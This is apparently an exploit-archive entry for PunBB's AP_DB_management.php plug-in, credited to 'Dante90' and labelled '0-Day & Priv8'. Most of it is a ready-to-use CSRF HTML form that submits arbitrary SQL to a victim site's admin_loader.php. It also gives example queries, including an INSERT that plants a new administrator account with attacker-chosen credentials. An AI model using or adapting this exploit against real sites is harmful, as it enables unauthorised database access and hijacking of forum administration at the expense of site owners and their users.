PunBB suffers from a remote SQL injection vulnerability when leveraging a cross site request forgery vulnerability in AP_DB_management.php.
5af98f2038d18971688979435e4efa2008d7b0edf2049ff2935b7f174f41d684
######################################################################################
#
#
# Author: Dante90, WaRWolFz
Crew #
# Title: PunBB (AP_DB_management.php) Remote SQL Injection CSRF By Dante90
[0-Day] #
# MSN: dante90.dmc4@hotmail.it
#
# Web: www.warwolfz.org
#
#
#
######################################################################################
[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote
SQL Injection CSRF Exploit By Dante90
[code]
<html>
<head>
<title>[0-Day & Priv8] PunBB Administration Plug-In
(AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>
</head>
<body>
<center><fieldset>
<legend>Run SQL query</legend>
<form name="Dante90" method="post" action="
http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php
">
<textarea name="this_query" rows="5" cols="50">
[SQL_Injection]
</textarea>
<input type="submit" name="submit" value="Run query" />
</form>
</fieldset></center>
</body>
</html>
[/code]
[SQL_Injection] = Insert the SQL Injection
Example of SQL Injection:
[code]
SELECT * FROM users WHERE id=2;
SELECT * FROM users WHERE group_id=1;
INSERT INTO users (group_id, username, password, email, num_posts,
registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',
'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',
'1220984516');
[/code]
[NICK_NEW_ADMIN] = New Administrator's Nick
[PASSWORD_NEW_ADMIN] = New Administrator's Password
[E-MAIL_NEW_ADMIN] = New Administrator's E-Mail
Dante90